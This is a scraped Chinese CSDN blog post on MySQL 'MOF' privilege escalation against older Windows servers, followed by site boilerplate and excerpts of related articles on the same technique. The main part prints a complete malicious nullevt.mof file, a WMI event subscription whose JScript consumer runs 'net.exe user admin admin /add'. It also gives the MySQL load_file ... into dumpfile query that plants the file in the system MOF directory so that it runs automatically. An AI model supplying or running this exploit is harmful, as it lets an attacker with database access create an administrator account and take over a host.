mysql mof提权原理_【提权】MySQL提权之MOF

最新推荐文章于 2023-10-07 16:38:19 发布

Lucy-Fintech社区

最新推荐文章于 2023-10-07 16:38:19 发布

阅读量114

点赞数

文章标签： mysql mof提权原理

本文链接：https://blog.csdn.net/weixin_35266799/article/details/113592907

版权

0x01 前言

Windows管理规范(WMI)提供了如下三种方法编译WMI存储库的托管对象格式(MOF)文件：

将MOF文件执行为命令行参数及Mofcomp.exe文件

使用IMofCompiler借口和$CompileFile方法

拖放到%SystemRoot%\System32\Wbem\MOF文件夹下的MOF文件中

使用MOF提权的前提是当前root账户可以复制文件到%SystemRoot%\System32\Wbem\MOF目录下。

0x02 漏洞利用方法

将一下代码保存为nullevt.mof文件

#pragma namespace("\\.\root\subscription")

instance of __EventFilter as $EventFilter

{

EventNamespace = "Root\\Cimv2";

Name = "filtP2";

Query = "Select * From __InstanceModificationEvent "

"Where TargetInstance Isa \"Win32_LocalTime\" "

"And TargetInstance.Second = 5";

QueryLanguage = "WQL";

};

instance of ActiveScriptEventConsumer as $Consumer

{

Name = "consPCSV2";

ScriptingEngine = "JScript";

ScriptText =

"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";

};

instance of __FilterToConsumerBinding

{

Consumer = $Consumer;

Filter = $EventFilter;

};

通过MySQL查询将文件导入

select load_file('c:\\recycler\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

导入后，系统会自动运行该文件。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Lucy-Fintech社区

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

操作系统权限提升(二十七)之数据库提权-MySQL MOF提权

把自己活成一道光，因为你不知道，谁会借着你的光，走出了黑暗。请保持心中的善良，因为你不知道，谁会借着你的善良，走出了绝望。请保持你心中的信仰，因为你不知道，谁会借着你的信仰，走出了迷茫。请相信自己的力量，因为你不知道，谁会因为相信你，开始相信了自己....

09-22

596

mof是windows系统的一个“托管对象格式”文件（位置：C:/windows/system32/wbem/mof/），其作用是每隔五秒就会去监控进程创建和死亡，mof目录下有两个文件夹（good与bad）。Windows server 2003及以下系统每5秒会执行一次mof目录下的文件，执行成功会移动到good文件夹，执行失败则会移动到bad文件夹。注：MOF提权只能用于Windows系统提权，Linux提权无法使用。

mysql mof提权_MySQL提权之mof提权

weixin_42498989的博客

01-19

733

mof提权原理关于 mof 提权的原理其实很简单，就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件，每分钟都会在一个特定的时间去执行一次的特性，来写入我们的cmd命令使其被带入执行。下面简单演示下 mof 提权的过程！MOF提权的条件要求十分严苛：1.windows 03及以下版本2.mysql启动身份具有权限去读写c:/windows...

参与评论您还未登录，请先登录后发表或查看评论

mof提权原理及其过程

aiquan9342的博客

02-09

389

mof提权的原理: mof是windows系统的一个文件（在c:/windows/system32/wbem/mof/nullevt.mof）叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后，然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行，这个mof当中有一段是vbs脚本，这个vbs大多数的是...

Mof提权科普

weixin_30915951的博客

01-23

143

今天再拿一个站的时候遇到了很多问题，拿站的过程就不说了，其中要用到mof提权，不管能不能提下，我进行一个mof提权的科普这里我综合各类mof提权进行了综合首先说一下，无shell情况下的mysql远程mof提权利用方法详解就是你注入拿到了数据库的root账号密码，直接进行扫到一个站的注入在havij中得到mysql数据库中mysql库保存的数据库密码：有...

mysql mof提权原理_（新安全原创精华）Mysql扩展文件MOF提权详讲

weixin_39773817的博客

01-28

109

本帖最后由阿甫哥哥于 2016-8-8 17:24 编辑哈喽，大家好，我是0x_ALis，我代表新安全网络攻防研究室又来咱们的I春秋发精华帖子了。希望大家可以支持我们，我们也会做得更好。无论是批评还是鼓励我们一样接受。【MYSQL提权】Mysql扩展文件MOF提权详讲【原理】在c:/windows/system32/wbem/mof/目录下的nullevt.mof每分钟都会有一个特定的时间去执...

mysql mof提权原理_Mof提权科普

weixin_29706351的博客

02-07

221

首先呢先谢谢米爷在我弄这个的时候把我骂开窍了- -。不多说了~。~像名称一样哈~首先呢是朋友扔我一shell他提权差就给咱了，简单的看了下，是php脚本的，一看php脚本就肯定带有，mysql。就在网站目录看了下data文件夹习惯性的~运气不错。Root。居然知道是这东西，上大马。(不知道利用菜刀)OK回显成功。5.0.67不用说都知道是什么了，这版本基本上udf都可以秒的，但毕竟这里说的是mof...

mysql mof提权原理_mof提权原理及其过程

05-16

Mof提权的原理是通过创建一个恶意的Mof文件，并将其注册到WMI中，然后利用WMI的执行权限来执行Mof文件中的命令，从而实现提权。具体过程如下： 1. 创建一个恶意的Mof文件，并将其中的类名定义为“__EventFilter”，...

113.网络安全渗透测试—[权限提升篇11]—[Windows 2003 Mysql MOF提权]

qwsn

07-06

2135

我认为，无论是学习安全还是从事安全的人，多多少少都有些许的情怀和使命感！！！ mof是windows系统的一个文件，存储在，叫做"托管对象格式"，其作用是每隔五秒就会去监控进程创建和死亡。然而提权的原理就是在拥有了mysql的root权限以后(其实就是获得了MySQL的启动身份)，然后使用该权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行，这个mof当中有一段是vbs脚本，这个vbs脚本段大多数写的是cmd的添加管理员用户的命令。（1）操作系统版本：Windows Server

mof提权文件nullevt.mof

03-12

其就是用又了mysql的root权限了以后，然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行，这个mof当中有一段是vbs脚本，这个vbs大多数的是cmd的添加管理员用户的命令。 mof文件通过Mofcomp....

mysql提权之MOF、UDF复现

qq_25768397的博客

08-25

919

今天复现了一下mysql提权，以往都没有尝试过，所以搭建环境尝试一下。搭建环境： phpstudy win7企业版 DVWA上传点以上步骤省略，跳到getshell后，使用哥斯拉进行提权。(假设所有条件满足，如不满足，尝试其他方法) 一、MOF提权原理：利用c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件，每分钟都会有一个特定的时间去执行一次，那么把cmd命令添加到nullevt.mof中，cmd命令就会自动执行了。注：mysql5.7 开始默认使

mysql mof提权原理_mof提权原理及实现

weixin_36462845的博客

02-01

357

关于 mof 提权的原理其实很简单，就是利用了c:/windows/system32/wbem/mof/目录下的nullevt.mof文件，每分钟都会在一个特定的时间去执行一次的特性，来写入我们的cmd命令使其被带入执行。下面简单演示下 mof 提权的过程！首先将我们的 mof 提权脚本上传到可读写目录下，这里就不做演示了。接着我们选择 MySQL 提权项，输入我们已经获取的MySQL 账户信息...

mysql mof提权原理_[原创]WEB安全第六章提权篇12 mof提权

weixin_30631569的博客

02-26

291

WEB安全第六章提权篇12 mof提权1、mof是什么托管对象格式 (MOF) 文件是创建和注册提供程序、事件类别和事件的简便方法。在 MOF 文件中创建类实例和类定义后，可以对该文件进行编译。编译 MOF 文件将在 CIM 储存库中注册所有的类定义和实例。之后，提供程序、事件类别和事件信息便可由便可由 WMI 和 Visual Studio Analyzer 使用。在 MOF 文件中创建提供...

数据库提权--MOF（MYSQL）

最新发布

qq_45936617的博客

10-07

563

MOF提权的利用原理是利用目录下的 nullevt.mof 文件，每隔一段时间（默认5s）都会用系统权限执行一次的特性，来写入cmd命令使其被带入以系统权限执行MOF提权的使用条件是：1、secure_file_priv参数不为null2、有修改nullevt.mof 文件的权限3、数据库用户具有root权限MOF提权的步骤是有恶意语句的mof文件写入到mof目录下-->系统每隔一段时间自动执行。

mysql mof_mof提权

weixin_33511821的博客

02-01

307

第一次接触提权，先看了个最简单的，哈哈哈哈，看了几个视频和文章，然后整理了一下，估计很多不对的地方，等真正了解了就回来改掉。原理mof是Windows系统的一个文件，位于c:windowssystem32wbemmofnullevt.mof，叫做托管对象格式，它的作用是每隔5秒，就会去监控进程的创建和死亡。mof提权的简单利用过程就是，拥有了MySQL的root权限后，使用root权限去执行上传操...

数据库提权之mysql_MOF

qq_45300786的博客

05-24

183

mysql——mof 脚本提权 https://blog.csdn.net/weixin_36462845/article/details/113592918 mysql——mof 脚本提权2 https://www.cnblogs.com/xishaonian/p/6384535.html mysql——mof 16进制提权 https://blog.csdn.net/cxrpty/article/details/104805108?utm_medium=distribute.pc_relevant.no

mof提权

qq115399231的博客

07-16

547

原理利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件，每分钟都会在一个特定的时间去执行一次的特性，来写入我们的cmd命令使其被带入执行。对windwos版本有所要求：仅限windows server2008以下的版本 mof提权代码 #pragma namespace("\\\\.\\root\\subscription") insta...

mysql之mof提权

Clannad的博客

11-17

503

文章目录靶机 Server 2003use exploit/windows/mysql/mysql_mof查看需要配置的参数配置参数输入 run 或者 exploit 来执行成功拿到meterpreter回显之后，输入shell，拿下shell开启和关闭3389端口靶机 Server 2003 use exploit/windows/mysql/mysql_mof 使用use 来调用此模块记...

Windows提权之第三方组件mysql提权(mof)

mrx56的博客

03-31

4057

为什么要提权？答：因为webshell的权限一般是继承中间件的权限，此时就需要提高到系统管理员权限才方便进一步渗透。一般java中间件运行权限最高。 Windows提权常用命令内置组： Administrators（管理员组） Guests (来宾组，权限最低，默认禁止) Users（新建用户组） net user 查看所有用户信息 net user + 用户名查看此用户信息 net user + 用户名 /del 删除此用户 net user + 用户名+密码 /add 添加用户 net loca